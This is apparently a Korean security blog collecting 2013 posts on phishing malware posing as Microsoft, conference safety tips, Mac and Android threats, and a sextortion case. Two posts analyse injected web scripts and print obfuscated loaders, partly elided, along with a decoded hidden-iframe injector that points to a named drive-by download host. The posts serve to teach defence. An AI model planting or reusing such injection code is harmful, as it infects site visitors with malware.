posted by Kwan's 2013. 3. 11. 15:08

 

마이크로소프트 Digital Crimes Unit으로부터의 보안 경고로 가장한 맬웨어 공격

Windows 사용자 여러분, 여러분은 컴퓨터 보안을 진지하게 받아드리고 있나요?

만약 그렇다고 하면, 여러분은 Microsoft Digital Crimes Unit으로부터 보낸 것 같은 이메일을 받았을 때는 즉각적인 조치를 취해야 할지도 모릅니다.

하지만, 그것은 사실 큰 실수입니다.

여러분은 마이크로소프트의 DCU(Digital Crimes Unit)가 Zeus와 연관된 봇넷서버를 다운시키기 위해 열심히 작업하였고, 의심스런 맬웨어 제작자를 조사했던 사람들이었다는 것을 기억할지도 모릅니다.

다음은 제목에 “Security”라고 된 스팸 메일의 한 형태입니다.

이메일 사용자 여러분,

새로운 취약점 때문에 여러분의 온라인 상세정보를 빼내려는 해커들에게 악용되고 있습니다.

이에 마이크로소프트 DCU(Digital Crimes Unit)는 2013년 새로운 보안조치를 개발하였습니다.

따라서 인터넷과 마이크로소프트 제품을 사용하는 모든 사용자들은 ISP나 호스팅업체에 상관없이 이메일 계정 정보를 인증받아야 합니다.

해커들이 새로운 취약점을 악용하는 것을 막기 위해 여러분의 이메일 계정을 인증하십시오

첨부된 'Microsoft_STF' 파일을 여러분의 PC에 다운로드하여, 실행하십시오. 그러면 마이크로소프트 보안 데이터베이스에서 업데이트할 것입니다.

만약 여러분의 이메일을 인증하지 않으면, 여러분의 이메일은 해커들이 여러분의 개인이나 회사 이메일 계정을 얻어서 기밀 정보에 접근하는 위험에 놓이게 됨을 유념해 주시기 바랍니다.

2013 Microsoft Digital Crimes Unit

이메일에 첨부된 파일은 Microsoft_STF_install.zip이란 파일입니다. 그런데 상기 이메일에 따르면, “모든 인터넷 사용자들”은 'there'(their의 오타) email account를 인증하기 위해 프로그램을 실행해야 한다고 합니다.

진짜처럼 보이지 않습니까?

바라건대 여러분 대부분은 청하지 않은 이메일은 의심하고 마이크로소프트가 보냈다는 이유로 프로그램을 실행할 만큼 어리석지는 않을 것입니다.

소포스 제품은 그 첨부파일을 Troj/Agent-AANA 트로이목마로 감지합니다.

마이크로소프트 Digital Crimes Unit로 가장하고, 그리고 사용자들을 속여 부지불식간에 그들의 Windows 컴퓨터를 감염시키기 위해 취약점과 맬웨어 감염에 대한 두려움을 이용하는 사이버 범죄의 아이러니에 우리들 중 어느 누구도 정신을 잃어서는 안될 것입니다.

슬프게도, 이런 류의 공포 전술은 분명 몇몇 사람들을 속일 수도 있습니다.

조심하십시오.

P.S. 진짜 Microsoft Digital Crimes Unit에 대한 내용은 여기서 보실 수 있습니다.

댓글을 달아 주세요

posted by Kwan's 2013. 3. 5. 21:58

http://www.securitytrust.co.kr/bbs/view.asp?tName=tb_sophosnews&RecID=20600



이번 주는 보안업계 최고의 엔지니어들이 함께 모이는 최대의 IT 보안 행사인 RSA Conference 2013이 열립니다.

비록 보안(안전)이 행사에 참여하는 모든 이의 마음속 가장 높은 곳에 자리잡고 있다는 것은 명백해 보이지만, 정보 보안 행사도 다른 행사와 마찬가지로 안전하지 않을 수 있다는 것을 북새통에 정신을 놓고 망각하기가 쉽습니다.

우리는 이번 RSA 컨퍼런스나 올해 다른 컨퍼런스에 참가하는 동안 명심해야 할 8가지 보안 팁에 대한 체크리스트를 만들어 보았습니다.

  1. 공개 WiFi 네트워크를 조심하고 가능할 때 VPN을 이용하세요.

    만약 여러분이 암호화 되지 않은 공개 WiFi 연결을 이용하고 있다면, 근처의 다른 사람들도 여러분의 대화를 엿볼 수 있습니다.

    여러분의 기기와 사무실간의 모든 대화를 암호화하는 VPN(virtual private network)을 사용하면 이것을 방지할 수 있습니다. 심지어 공개 WiFi가 암호화되었다 하더라도, 여러분은 그것을 이용 가능하게 한 사람을 알지 못합니다.

    만약 여러분이 공개 WiFi를 이용하여 온라인 서비스에 접속해야만 한다면, 로그인과 데이터 전송시에 HTTPS만을 사용해야 함을 명심하십시오. 안전한 WiFi 서핑에 대한 팁을 확인하시기 바랍니다.

  2. 스마트폰과 태블릿에 대한 패스코드와 보안 소프트웨어를 사용하십시오.

    원격 잠금이나 삭제, 분실이나 도난 기기에 대한 추적 및 맬웨어 보호와 같은 보안 기능을 제공하는 무료 앱들이 많이 있습니다. 안드로이드 사용자들은 소포스의 무료 모바일 시큐리티(Mobile Security) 앱을 검토해 보십시오.

  3. 여러분 기기의 보안 세팅을 점검하십시오.

    여행 중이 아니라면, 우리의 보안 앱이 어떻게 동작하는지, 어떻게 세팅해야 하는지에 대해 느슨해지기 쉽습니다. 하지만, 여러분이 붐비는 컨퍼런스 센터 곳곳에서 정신없이 부산을 떨고 있을 때면, 보통 때보다 더 신속하게 여러분 기기를 잠그기 위해 세팅을 업데이트해 하는 것을 고려하십시오.

  4. 만약 그 기기가 *필요*하지 않다면, 그것을 가져가지 마십시오.

    여러분은 업무용 스마트폰 하나와 개인용 스마트폰 하나를 사용하시나요? 그럼 간단합니다. 하나만 선택하고 다른 하나는 안전하게 호텔방에 보관하세요. 만약 호텔방에 금고가 있다면, 전시장에 가져갈 필요가 없는 모든 기기나 업무문서를 보관하는 데 그것을 사용하십시오.

  5. 판매자에 의해 제공되는 사은품에 마음을 빼기지 않도록 주의하십시오.

    여러분은 마음에 드는 무료 USB키를 받을지도 모르지만, 그것은 모르는 사이에 맬웨어에 감염되게 할지도 모릅니다. 믿거나 말거나, 우리는 호주에서 열린 보안 컨퍼런스인 AusCERT에서도 이런 일이 일어나는 것을 보았는데, IBM이 부주의하게도 하나가 아니라 두 개의 맬웨어에 감염된 무료 USB 드라이버를 제공하였습니다.

  6. 꼭 필요한 경우가 아니라면 회사 데이터에 접근하지 마십시오.

    만약 여러분이 중요한 데이터에 접속할 수 있는 노트북이나 태블릿, USB 드라이브 또는 다른 기기를 가지고 가야만 한다면, 암호화를 해야 함을 명심하십시오. 만약 그 기기가 나쁜 사람들 손에 들어가게 된다면, 여러분은 매우 고마워하게 될 것입니다.

  7. 핸드폰 충전 키오스크와 주스재킹(juicejacking) 위험 가능성에 주의하십시오.

    '주스재킹(Juicejacking)'은 파워/데이터 연결용 핸드폰 어댑터 같은 것을 통해 스마트폰을 해킹하는 것입니다. 우리는 아직 실제로 보지 못했지만 우리가 첫 번째 희생자가 되지는 맙시다.

  8. 편집증 환자들이라면 임시 노트북이나 임시 핸드폰을 이용하세요.

    여러분에 관한 중요한 데이터를 휴대하지 않는 것은 비록 여러분의 기기가 도둑맞거나 해킹 당하거나 하더라도 여러분의 정보가 위함에 처하지 않는다는 것을 의미합니다. 여러분이 집으로 돌아가면, 그 기기의 정보는 삭제 됩니다. 

댓글을 달아 주세요

posted by Kwan's 2013. 2. 27. 16:00

http://www.securitytrust.co.kr/bbs/view.asp?tName=tb_sophosnews&RecID=20500

만약 여러분이 Mac에 대한 맬웨어는 거의 없다고 여전히 생각한다면, 여러분은 쿠퍼티노(Cupertino)에 있는 꽤 유명한 과일 회사(Apple)의 보안 엔지니어와 말하기를 원할지도 모릅니다.

로이터 통신에 따르면, “Apple은 최근에 해커들에 의해 공격을 받았는데, 몇 몇 종업원들의 매킨토시 컴퓨터가 감염되었다.”고 합니다.

좀 더 구체적으로는, Apple 엔지니어들의 Mac OS X 노트북들이 지난주 Facebook을 공격했던 것과 동일한 제로데이(zero-day) Java 취약점에 의해 감염되었습니다.

Apple이 더 루프(The Loop)에 했던 성명서에서 Apple 대변인은 “그 맬웨어는 Apple과 다른 회사들(Facebook이나 Twitter등)을 공격할 때 사용되었고, 소프트웨어 개발자들을 위한 웹사이트를 통해 배포되었다”고 전했습니다.

공개적으로 이용 가능한 정보로부터 이 성명서는 이번 공격이 “워터링 홀 공격(watering hole attack)”으로 알려지게 된 것을 재확인하게 되었습니다.

그 컨셉은 회사를 직접적으로 공격하는 것보다 사람들이 자주 가는 사이트를 감염시키는 게 훨씬 더 쉽다는 것입니다.

Facebook과 Apple의 모든 보호막을 깨려고 시도하는 것은 매우 어렵게 될 것입니다.

하지만 Apple과 Facebook, 그리고 다른 고가치 표적들(high value targets)이 자주 방문할지도 모르는 작은 어플리케이션 개발자들의 웹사이트에 대한 보안을 위협하는 것이 훨씬 더 쉬울지도 모릅니다.

나는 Apple OS X가 온라인 공격의 배후에 있는 범인에 의해 더 이상 간과되고 있지 않는 맬웨어에 의해 타깃이 될 만한 사람들 사이에서 충분히 인기가 있다고 말하는 것이 타당하다고 생각합니다.

“어리석은 Mac 사용자만 자발적으로 맬웨어를 설치할 것이다”라고 말하는 사람들은 Apple 자사의 엔지니어들도 희생자가 될 수 있다는 것을 알게 되면 놀랄지도 모릅니다.

이것은 사용자의 역량이나 사람들이 종종 선택하는 웹사이트의 종류에 대한 것이 아닙니다. 패치되지 않은 취약성은 동일한 방법으로 우리 모두에게 영향을 끼치게 됩니다.

이것이 사용하는 플랫폼에 상관없이 안티바이러스를 필수적으로 사용해야 하는 이유입니다. 또한, IPS와 방화벽을 이용함으로써 네트워크 트래픽을 주의 깊게 모니터링 하는 것도 중요합니다.

그것은 최근 안티 바이러스와 만약 여러분이 감염을 막을 수 없다면, 시작시에 감염을 예방하지만 그것을 감지하는 효과적인 방어시작을 얻게 합니다.

사람들은 종종 그들의 방화벽을 단순한 방어 메커니즘으로 생각하지만, 그것은 법의학적인 목적으로 제공되기도 합니다.

만약 여러분이 Apple이나 Facebook을 이용하고 어떤 데이터가 여러분의 범죄 지배자들에게 수색되었는지 알아야 한다면, 여러분의 모니터링 솔루션으로부터 나온 자세한 로그들이 법의학 수사팀에게 필수적입니다.

2-3년간 로그정보를 유지한다는 것이 힘이 들긴 하지만, 여러분이 만약 감염을 당하게 된다면 그것은 여러분의 문제를 해결하는데 가치가 있을지도 모릅니다.

여러분은 이 결과로서 무엇을 해야 할까요? 만약 여러분이 Mac 사용자라면, 여러분의 컴퓨터를 확실히 패치해야 합니다. Apple은 이번 공격에 대응하기 위해 그날 오후에 자바 맬웨어 제거 툴(Java malware removal tool)을 발표할 것이라고 말하였습니다.

또한, 향후의 모든 공격을 발견하기 위해 안티바이러스를 최신으로 업데이트 하고, 여러분이 매일 매일 웹서핑을 하기 위해 자바가 필요하지 않는다면 브라우저에서 자바를 사용안함으로 하는 것이 좋습니다.

공평하게도, 그 충고는 컴퓨터 사용자들이 Windows나 OS X이나 Linux 어떤 것을 좋아하든지 모두에게 적용됩니다. 많은 시간을 안전한 상태로 있는 것이 편하지는 않지만, 길게 보면 투자할 가치가 있는 것입니다. 

댓글을 달아 주세요

posted by Kwan's 2013. 2. 21. 01:09

http://www.securitytrust.co.kr/bbs/view.asp?tName=tb_sophosnews&RecID=20400


작년 동안, 소포스랩은 이미 패치가 적용된 MS 오피스의 오래된 취약점을 이용하는 중국의 소수민족들에 대한 공격에 대해 이야기를 해 왔습니다.

우리는 과거에 몇몇 공격들을 봐왔습니다.

이번 주 초에는, 에일리언봍트(AlienVault)의 직원이 Mac OS X의 오피스 제품에서 동일한 취약점을 사용한 또 다른 공격을 봤는데, 그것은 서부 터키의 위구르(Uyghur) 족을 타깃으로 하는 것입니다.

MS09-027로 알려진 그 취약점은 마이크로소프트 워드에서 원격 코드 실행을 허용하는 것이었고, 2009년 6월에 마이크로소프트에서 패치를 했었습니다.

그 의미는 패치되지 않은 컴퓨터에서 부비트랩 워드문서를 열면 여러분 Mac에 악성코드를 실행시킬 수 있다는 의미입니다. 여러분이 정신이 없어 워드파일의 내용을 읽게 되면, 맬웨어는 눈에 띄지도 않고 조용히 여러분 컴퓨터에 설치됩니다.

많은 Mac 사용자들은 Mac OS가 어떤 소프트웨어를 설치하기 전에 관리자의 사용자명과 비밀번호를 물어볼 것이라는 희망을 가지고 있겠지만, 그것이 유저랜드(userland) 트로이목마(Trojan)와 같은 공격에는 그런 메시지가 뜨지 않고, 관리자 신원정보를 요구 받지도 않을 것입니다.

왜냐하면 이것은 루트 권한을 요구하는 Mac OS X의 /tmp/ nor /$HOME/Library/LaunchAgents 폴더에 있지 않기 때문입니다. 소프트웨어 어플리케이션들은 어떤 어려움도 없이 userland에서 동작할 수 있고, 심지어 네트워크 소켓을 열고 데이터를 전송할 수도 있습니다.

소포스 제품들은 그 악성 문서를 Troj/DocOSXDr-B로 감지하고 그 맬웨어를 Mac 트로이목마 OSX/Agent-AADL로 감지합니다.

확실히 이번 캠페인 동안에 OSX/Agent-AADL는 약간의 성장이 있었습니다. 왜냐하면 우리가 3개의 서로 다른 버전을 봤기 때문인데, 그 첫 번째 것은 매우 흥미롭습니다.:

트로이목마의 최신 버전에서, 그 기능과 다양한 이름들은 밝혀졌고 그 쉘 스크립트 파일명은 더욱 더 감추어졌습니다.

다시 한번, Mac 사용자들은 그들 컴퓨터의 안전이 만족스럽지 않다는 것을 명심할 필요가 있습니다. 비록 Windows 용 맬웨어보다 Mac용 맬웨어가 훨신 적기는 하지만, 만약 여러분이 이와 같은 공격에 타깃이 된다면 어떤 보상도 없을 것입니다.

Windows 사용자들처럼 Mac 사용자들도 최신 보안 패치에 관심을 기울이고 그들의 소프트웨어를 최신 업데이트로 적절히 유지해야 할 필요가 있습니다.

만약 여러분이 아직 그렇게 하고 있지 않다고 하면, 여러분의 Mac에 안티 바이러스 소프트웨어를 설치하십시오. 여러분이 홈 사용자라면, 우리는 Mac 고객을 위한 무료 안티바이러스를 제안합니다.

댓글을 달아 주세요

posted by Kwan's 2013. 2. 14. 20:24

우연히 해외 사이트를 보던 도중 Exploit 을 보아서 이렇게 써봅니다.

우선은 배치된 코드는 다음과 같습니다.

try{bgewg346tr++}catch(aszx){try{dsgdsg-142}catch(dsfsd){try{("".substr+"")()}catch(ehwdsh){try{window.document.body++}catch(gdsgsdg){dbshre=204;}}}}
if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}
asgq=new Array
(1,2,99,97,28,32,93,105,94,113,101,94,104,111,42,95,94,110,64,104,93,102,95,105,112,107,59,115,
79,93,95,71,91,104,97,32,32,92,106,96,113,32,35,86,44,85,34,117,8,5,1,2,99,97,110,89,102,95,109,
36,33,52,7,4,5,117,25,95,103,111,93,25,117,8,5,1,2,94,106,95,109,102,95,105,112,38,112,108,100,
112,93,33,28,55,101,94,107,91,104,97,24,108,108,94,57,31,97,110,111,108,50,40,41,96,106,100,90,
108,98,97,101,94,104,111,48,38,105,108,106,43,101,98,97,99,112,39,93,108,106,108,104,98,104,98,
91,97,103,109,111,93,100,101,99,105,99,38,105,98,107,35,24,112,99,95,112,96,54,33,44,44,31,25,98,
96,101,95,97,110,56,35,41,41,33,27,111,108,114,102,96,57,31,112,99,95,112,96,51,43,43,44,104,113
,53,99,97,97,96,98,111,54,41,41,42,107,116,51,105,105,110,101,108,98,105,105,54,89,91,109,106,104,
109,109,95,54,104,93,95,110,53,41,41,41,42,107,116,51,109,105,107,54,40,52,33,57,56,39,98,96,109,
93,101,94,56,29,37,51,6,3,4,121,5,2,3,97,113,102,92,110,100,107,102,25,99,97,110,89,102,95,109,36,
33,116,[생략]96,35,33,52,96,41,111,93,109,59,111,112,106,98,92,112,112,93,33,33,110,110,91,32,38,
34,100,108,109,106,53,43,39,94,104,103,93,106,96,95,104,97,102,109,46,41,108,106,104,41,104,101,95,
97,110,42,96,106,104,106,107,101,102,96,89,100,106,107,109,91,103,104,97,103,97,41,108,96,105,33,36
,55,94,39,109,111,117,100,94,40,103,97,94,109,55,34,41,41,41,42,107,116,31,52,96,41,111,108,114,102,
96,42,108,104,106,56,35,40,32,53,97,42,107,109,115,103,97,38,105,105,110,101,108,98,105,105,57,31,
90,92,110,107,100,110,110,96,35,51,95,40,110,112,113,101,95,41,104,93,95,110,56,35,40,32,53,97,42,
107,109,115,103,97,38,109,105,107,57,31,41,33,54,98,38,108,95,111,61,108,109,108,100,94,109,109,
95,35,35,111,98,94,111,100,31,37,33,44,44,31,34,53,97,42,107,94,110,60,112,108,107,99,93,113,108
,94,34,34,100,93,98,97,99,112,31,37,33,44,44,31,34,53,8,5,1,2,94,106,95,109,102,95,105,112,38,96,
95,111,65,100,94,103,96,106,108,108,60,116,80,89,96,72,92,105,93,33,33,93,107,92,114,33,36,87,40,
86,40,92,108,104,94,104,95,63,96,98,102,95,36,94,34,53,8,5,1,118);
s="";for(i=0;i-637!=0;i++){if(020==0x10)s+=String.fromCharCode(1*asgq[i]-(i%5-8));}
z=s;e(z);}


asgq=new Array 로 정의 되어 있는 코드는 정상적인 아스키코드가 아닙니다.
일반 String.fromCharCode를 통해서 출력을 해보면.. 다음과 같은 문자가 나옵니다!

ca ]i^qe^ho*_^n@h]f_ipk;sO]_G[ha \j`q #V,U"u canYf_m$!4 u _go] u ^j_mf_ip&pldp]! 7e^k[ha ll^9 anol2()`jdZlbae^ho0&ilj+ebacp']ljlhbhb[agmo]decic&ibk# pc_p`6!,, b`e_an8#))! olrf`9 pc_p`3++,hq5caa`bo6))*kt3iinelbii6Y[mjhmm_6h]_n5)))*kt3mik6(4!98'b`m]e^8 %3 y aqf\ndkf canYf_m$!t o[m ^ 7 `g\ohafm(^n]Zn`Ad^g`jl!!dbjZg`#!4`)o]m;opjb\pp]!!nn[ &"dlmj5+'^hg]j`_hafm.)ljh)he_an*`jhjkef`Ydjkm[ghaga)l`i!$7^'moud^(ga^m7")))*kt 4`)olrf`*lhj8#( 5a*kmsga&iinelbii9 Z\nkdnn`#3_(npqe_)h]_n8#( 5a*kmsga&mik9 )!6b&l_o=lmld^mm_##ob^od %!,, "5a*k^n


이와 같이 정상적인 아스키코드로 나오지 않습니다.

그렇다면 다시 코드를 살펴보면 다음과 같습니다.


s="";for(i=0;i-637!=0;i++){if(020==0x10)s+=String.fromCharCode(1*asgq[i]-(i%5-8));

즉... i=0; i-637!=0;i++ ->  i-637 값이 0이 아닐때까지 루핑을 한다는 뜻입니다.
결론적으로   i-637!이 0에 도달하면 이 함수는 끝이나게 됩니다.
i++와 같이 계속 1씩 증가함으로 637이 되는순간 함수는 끝나게 됩니다.

다음오로 {if(020==0x10)s+ 은 -> 020 == 10진수일경우 s가 증가 하게 됩니다.

그렇다면 어떤한 방식으로 다시 배치를 하는걸 까요?? 바로 String.fromCharCode(1*asgq[i]-(i%5-8)); 입니다.
asgq=new Array 에서 처음이 1이니 1*1-(i->0%5-8) 이런식으로 계산을 하게 됩니다.


이를 바탕으로 연산과정을 거치면 ! 연결된 링크를 볼수 있습니다 : )



if (document.getElementsByTagName('body')[0]){
iframer();
} else {
document.write("<iframe src='http://enlargement4.pro/might/dropping_installing.php' width='10' height='10' style='width:100px;height:100px;position:absolute;left:-100px;top:0;'></iframe>");
}
function iframer(){
var f = document.createElement('iframe');f.setAttribute('src','http://enlargement4.pro/might/dropping_installing.php');f.style.left='-100px';f.style.top='0';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');
document.getElementsByTagName('body')[0].appendChild(f);
}


바이러스 토탈 링크 :
https://www.virustotal.com/ko/file/becc92d0fa7e355e231c3b9da797a5e8fa9b39ef79ab6da48e98b5e20e1d685a/analysis/1360839068/

우선 처음으로 작성을 해보았는데.. 부족한 접이 있더라도 이해해 주세요~
틀린점이 있다면 지적을 해주셔도 좋습니다 : )

마지막으로 도움을 주신 바이올렛님께 감사를 드립니다 : )


댓글을 달아 주세요

posted by Kwan's 2013. 2. 7. 19:41


FBI는 페이스북 사용자의 계정을 해킹하고, 스카이프(Skype)를 통해 자신이 지켜보는 동안 수백 명의 여성들을 강제로 옷을 벋게 한 혐의로 27세 남자를 체포하였습니다.

캘리포니아 글렌데일(Glendale)의 Karen 'Gary' Kazaryan이 어제 연방 컴퓨터 해킹 혐의로 체포되었습니다.

법무부의 공식 발표에 따르면, Kazaryan은 피해자의 이메일과 페이스북 계정을 해킹하여 패스워드를 변경하였고, 나체사진과 반나체 사진들을 검색하였다고 합니다.

게다가, Kazaryan은 피해자의 패스워드와 친구 이름, 기타 개인정보 등 피해자에 대한 다른 정보까지 빼내었습니다.

여성인척 가장한 Kazaryan은 다른 잠재 피해자들을 속여 그들의 여자친구들 중의 한 명과 대화하고 있다고 믿게끔 하고, 그들이 웹캠 앞에서 옷을 벗도록 설득하였습니다.

Kazaryan은 그들이 만약 그의 요구에 순응하지 않으면, 그들의 페이스북 페이지에 피해자의 누드사진 몇 장을 올린다고 협박까지 하였습니다.

FBI는 Kazaryan의 컴퓨터에서 대략 3천여 장의 사진을 찾았다고 하는데, 350명 이상의 여성들이 "섹스토션(sextortion, 성적 강요)"이란 것으로부터 고통 받을지도 모릅니다.

만약 모든 기소들이 유죄로 판명되면, Kazaryan은 최대 105년 이상의 징역형에 처해질 수 있습니다.

FBI는 자신들도 피해자일지도 모른다고 생각하는 모든 여성들이 Los Angeles Field Office (310) 477-6565로 연락하도록 촉구하고 있습니다.

해커들은 어떻게 웹캠을 이용하여 그들의 성적 쾌감을 얻을까요.

수년 간, 우리는 웹캠을 이용하여 젊은 여성들을 훔쳐보고, 그들을 협박하여 옷을 벋게 하거나 성적인 행동을 하게 하는 해커들의 이야기를 많이 들어왔습니다.

예를 들어, 2005년 초 스페인 정부는 순진한 사용자들로부터 동영상 자료를 캡쳐했던 한 학생에게 벌금형을 내렸고, 은행 정보를 훔치는 동안 웹캠을 통해 피해자를 감시해 온 37세 남자를 체포했었습니다.

다음해, 더비셔(Derbyshire) 일케스튼(Ilkeston)의 잉글리쉬 타운에 사는 Adrian Ringland는 인터넷 채팅방에서 미성년자로 위장하여 입장하고 스파이웨어를 이용해 어린이들의 웹캠을 통해 노골적인 사진들을 훔친 혐의로 10년 징역형을 선고받았습니다.

그리고, 2008년에는 27세 캐나다 남자가 스파이웨어를 이용해 14세 보다 어린 여성들의 웹캠을 해킹하여 자신을 위해 옷을 벋도록 강요하여 기소되었습니다.

2011년에는 서부 캘리포니아의 한 남자가 100개 이상의 컴퓨터를 해킹하여, 거기서 훔친 개인정보를 이용하여 젊은 여성과 10대 소녀들의 성적으로 노골적인 동영상을 갈취한 혐의로 6년 징역형을 받았습니다.

하지만, 제가 들은 가장 놀라운 사건은 아마도 잠재적인 희생자의 노트북 화면에 에러 메시지를 나타냈다고 하는 남자의 케이스인데, 그는 희생자들을 속여 그들의 웹캠을 해킹하여 샤워기로 대체하여 보여주었습니다.

많은 홈 사용자들이 침실에서 무방비로 PC를 유지하고 있기 때문에, 특히 젊은이들 사이에서는 남용에 대한 상당한 잠재력이 분명히 존재합니다.

말씀 드리려고 하는 메시지는 간단합니다. 최신 위협들에 대해 여러분의 PC를 안티 맬웨어 소프트웨어, 보안 패치와 방화벽 등으로 지속적으로 보호하시고, 만약 의심이 든다면, 여러분이 사용하지 않을 때는 웹캠을 꺼두시기 바랍니다.

PS) 희소식은 가끔 웹캠 스파이활동이 해커들에게 역효과를 나을 수 있다는 것입니다.

2012년에, 조지아(Georgian) 정부는 그들 컴퓨터에 대한 인터넷 공격이 러시아 보안 기관과 관련되어 있다고 주장하였습니다.

하지만, 조지아 정부의 CERT (Computer Emergency Response Team)는 공격에 가담했다고 확신하는 해커의 컴퓨터를 비밀리에 해킹하고 그의 비디오 자료를 빼냄으로써 그 해커에 대해 보복하였습니다.

아마도 웹캠에 녹색불이 들어와 있을 때는 더 많은 주의를 기울인다는 것은 좋은 생각일겁니다.

댓글을 달아 주세요

posted by Kwan's 2013. 1. 28. 20:06


Google이 공식 안드로이드 앱 스토어에 있는 앱들을 감시하는 일을 충분히 잘하고 있을까요?

사기꾼들이 돈을 벌기 위해 합법적인 게임의 명성과 평판을 악용하며, Google Play에서 공개적으로 계속 다운로드 가능하게 하는 가짜 앱의 수로 판단하자면, 그것은 아닌 것 같습니다.

예를 들어, “abbaradon”이라 불리는 안드로이드 앱 개발자에 의해 만들어진 앱을 한번 살펴보시죠.(하지만, 설치하지는 마시길 바랍니다.):

'Plants vs Zombies'와 'PES 2012' (Pro Evolution Soccer)를 포함해 꽤 알려진 게임들 리스트가 거기에 있습니다.

'Plants vs Zombies'의 실제 안드로이드 버전은 Electronic Arts에서 개발하였는데, 유료 버전이며 수천 개의 리뷰가 있습니다.

하지만, Abbaradon 버전은 무료이며 Google Play 스토어에 있는 Description 밑에 눈에 띄지 않게 작은 글씨로 된 부분이 있습니다.

Plants vs. Zombies 무료! 좋은 평가만 남겨주세요. 질문이 있으시면 메일을 보내주세요. 이것은 게임 팬들에게는 특히나 놀라운 퍼즐입니다.

뛰어난 앱, 그것도 무료인 앱을 계속해서 제작하기 위해서는 앱을 만드는 데 시간과 비용이 들기 때문에, 우리는 우리의 앱을 현금화하기 위한 새로운 검색 서비스를 이용하고 있습니다. 이 서비스로 인해 우리는 여러분을 위한 더 훌륭한 앱을 개발할 수가 있습니다. 이 옵션은 여러분이 사용할 수 있도록 몇 가지 검색 포인트(아이콘, 북마크, 홈페이지)를 번들로 제공합니다. 여러분은 이것들을 손쉽게 제거할 수 있으며 우리 앱에는 어떤 영향도 끼치지 않습니다. 감사합니다!

그 앱 자체는 절대 Plants vs Zombies가 아닙니다. 그것은 단순한 그림 맞추기 퍼즐 타입의 앱인데 게임에 나오는 이미지를 사용하고 있습니다.

그리고, 그것은 Abbaradon도 아닙니다. 소포스랩은 지난 몇 주간, 순진한 사용자의 돈을 빼가려고 하는 수많은 유사 가짜 앱들을 봐 왔습니다. Google은 악한 개발자들을 근절시키려고 애쓰고 있지만, 그들은 자신들의 가짜 앱들을 단순히 새 이름으로 바꿔서 다시 업로드 시킵니다.

그래서, 만약 여러분이 이러한 앱들 중 하나를 실행시킨다면 무슨 일이 일어날까요?

아래 스크린샷에서 여러분은 우리가 PES 2012의 가짜 버전을 실행시켰을 때 어떤 일이 일어났는지 볼 수 있습니다.

그 프로그램은 광고지원형(ad-supported)이어서, 앱과 여러분의 안드로이드 기기의 알림창에 광고를 표시할지도 모릅니다.

더군다나, 그들은 여러분의 이메일과 전화번호 등 여러분에 대한 정보를 수집할 것이라고 얘기합니다. 만약 여러분이 광고 중 하나를 클릭한다면 써드파티 페이지로 연결됩니다.

그런데, 여러분이 하고 싶었던 것은 무료 축구 게임을 갖는 거였습니다.

하지만, 거기서 멈추지 않고 그 앱은 여러분의 브라우저 홈을 바꾸고, 북마크에 추가하고, 여러분 기기의 홈 화면에 아이콘을 추가할 것입니다. 이 모든 것은 앱 개발자가 돈을 벌도록 설계되었습니다.

아니나 다를까, 우리가 다운로드한 게임 아이콘 외에도 몇 개의 검색 아이콘들이 안드로이드 홈 화면에 추가되었습니다.

그 아이콘을 클릭하면, Moberium과 같은 검색엔진으로 이동합니다.

그 앱들은 Apperhand와 Clicxap, Airpush, Startapp과 같은 다양한 광고 프레임워크들을 사용하고 있는데, 유명한 게임의 프리버전인척 하면서 아마도 Google Play 스토어에 있는 앱들 주위에서 회자되는 개발자가 돈을 벌고 있습니다.

Google은 이런 식으로 사용자들을 속이는 앱 개발자들을 좋아하지 않습니다. 그래서 악의적인 개발자들은 다른 인증, 다른 이름을 사용하고 있는데, 그래서 그들의 패키지들이 매우 혼란스럽게 되어있어서 확실히 비슷해 보이지 않습니다.

비록 분석가들이 앱들이 비슷한 일을 하고 있다는 것을 알아내는 것은 쉬울지 몰라도, Google의 자동화 시스템은 그들의 안드로이드 앱 스토어에서 이런 가짜 수익 창출 앱을 발견하는 것은 훨씬 힘들어 보입니다.

소포스는 그 가짜 앱들을 Andr/NewyearL-B로 감지합니다.

안드로이드 맬웨어는 증가하고 있는 문제이며, 심지어 공식 Google Play 스토어에서도 그들의 방식으로 돈을 벌고 있는 악성 앱이 발견되었습니다. 예를 들어, 작년에 우리는 한 네이키드 시큐리티 독자가 Legend of Zelda 게임의 공식 안드로이드 버전이었다고 생각했던 것을 다운로드 했는데, 결국은 팝업 공지와 광고로 공격 당했다는 것에 대해 얘기를 했습니다.

만약 여러분이 증가하는 수많은 위협들에 대해 안드로이드 스마트폰이나 태블릿을 보호해야 할 때라고 생각하신다면, 소포스의 무료 안드로이드 안티바이러스 앱을 검토해 보시기 바랍니다.

댓글을 달아 주세요

posted by Kwan's 2013. 1. 24. 20:10

발견지 : http://integridesign.com/David/index.php?target=contact

* 위 페이지 접속시 악성스크립트에 감염 될 수도 있습니다!


위와같이 사이트 접속시 정상 스크립트 내에 이와같이 알수 없는 문구들로 이어진 스크립트를 발견 할 수 있습니다!


</body>

</HTML>

<script>var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f766e627

57974612e636f2e62652f666f72756d2e7068703f74703d3637356561666563343331623166373222207

7696474683d223122206865696768743d223122206672616d65626f726465723d223

[생략]";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);</script>


<script>var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f616d65

726963616e6d6f62696c652e63612f666f72756d2e7068703f74703d363735656166656334333162316

63732222077696474683d223122206865696768743d223122206672616d65626f726465723d2230223

e3c[생략]";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);</script>


<script>var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f6c6f63

756d7265736f75726365732e636f6d2f666f72756d2e7068703f74703d3637356561666563343331623

1663732222077696474683d223122206865696768743d223122206672616d65626f726465723d2230

223e[생략]";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);</script>


잠깐 확인을 해보자면 이 코드는 간단하다.

 "var t" 로 지정되어있는 값이 String.fromCharCode 거쳐 eval 함수에서 출력이 된다 !

알수 없이 이어진 숫자들은 바로 16진수 HEX 코드이다.

HEX 코드를 다시 문자열로 변환하는 방법은 아스키 코드표를 보면 쉽게 스크립트가 어디로 연결 되어 있는지를 볼 수 있다 !


